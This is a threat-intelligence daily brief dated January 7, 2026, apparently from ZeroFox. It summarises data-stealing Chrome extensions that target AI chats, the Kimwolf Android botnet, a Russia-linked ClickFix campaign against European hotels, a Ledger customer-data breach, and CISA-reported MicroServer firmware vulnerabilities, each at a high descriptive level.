ZeroFox Daily Intelligence Brief - January 7, 2026

ZeroFox Daily Intelligence Brief - January 7, 2026

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• Extensions Exfiltrating Chat Conversations from More than 900,000 Users
• Kimwolf Botnet Increasingly Scanning for Vulnerable Devices
• European Hospitality Sector Being Targeted by Russia-Linked ClickFix Campaign

Extensions Exfiltrating Chat Conversations from More than 900,000 Users

Source: https://thehackernews.com/2026/01/two-chrome-extensions-caught-stealing.html

What we know: Two malicious extensions, which have over 900,000 users, have reportedly been exfiltrating ChatGPT and DeepSeek conversations and browsing data. Stolen data is periodically sent to attacker-controlled servers, exposing sensitive personal and corporate information.

Context: The malicious extensions, called “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” and “AI Sidebar with DeepSeek, ChatGPT, Claude, and more,” still remain available on a popular web store at the time of writing. The extensions impersonate legitimate tools and abuse certain user-granted permissions to harvest AI chats and browser activity.

Analyst note: Installing these extensions are likely to result in data exfiltration, corporate espionage, credential exposure, and targeted phishing campaigns, particularly if users have shared sensitive personal or business information.

Kimwolf Botnet Increasingly Scanning for Vulnerable Devices

Source: https://www.bleepingcomputer.com/news/security/kimwolf-android-botnet-abuses-residential-proxies-to-infect-internal-devices/

What we know: Kimwolf botnet has reportedly compromised over 2 million Android devices and also increased its scanning activity for vulnerable devices in the past month. The botnet has mostly targeted residential proxy networks with exposed Android Debug Bridge (ADB) services.

Context: Majority of the infected devices are reportedly located in Brazil, Saudi Arabia, India, and Vietnam. Common targets include Android-based TV boxes and streaming devices, which enable unauthenticated access over ADB.

Analyst note: Generic and uncertified Android TV boxes are likely at higher risk of being compromised by botnets. Users of compromised devices are likely at the risk of account takeover attempts. Furthermore, botnets such as Kimwolf are likely to be used in distributed denial of service (DDoS) attacks, ad fraud, and other cybercriminal activities.

European Hospitality Sector Being Targeted by Russia-Linked ClickFix Campaign

Source: https://www.theregister.com/2026/01/06/russia_hackers_hotel_bsods/

What we know: Russia-linked threat actors are reportedly carrying out a ClickFix attack campaign targeting European hotels and other hospitality entities, to deliver a remote access trojan.

Context: The campaign begins with a phishing email appearing to be from Booking[.]com warning of unknown charges in euros. The email takes the victim to a fake verification screen, which is followed up with a Windows Blue Screen of Death (BSOD) display, tricking the victim into executing a malicious code in the guise of fixing the issue.

Analyst note: The campaign likely intends to collect traveler data that can be leveraged in travel-related scams or for phishing and social engineering attacks.

DEEP AND DARK WEB INTELLIGENCE

Ledger data breach: Physical crypto wallet maker Ledger has confirmed a data breach originating from e-commerce partner Global-e, resulting in customer data being stolen and phishing attempts being reported. Stolen data includes names, contact details, and order history and information. Ledger has confirmed that passwords, crypto recovery phrases, or payment details have not been leaked. Threat actors are likely to sell the stolen data to other cybercriminals, leading to an increase in phishing attacks.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CISA warns of multiple MicroServer bugs: Multiple vulnerabilities, included in CISA's Industrial Control Systems (ICS) advisory, involving Columbia Weather Systems MicroServer firmware can enable attackers to redirect secure shell (SSH) connections, steal plaintext secrets, and gain admin access. If exploited, these vulnerabilities are likely to enable attackers to hijack trusted communications, maintain persistent unauthorized access, manipulate or delete critical weather data, and disrupt operational technology environments relying on MicroServer systems.

Affected products: The affected products are included in CISA’s ICS advisory.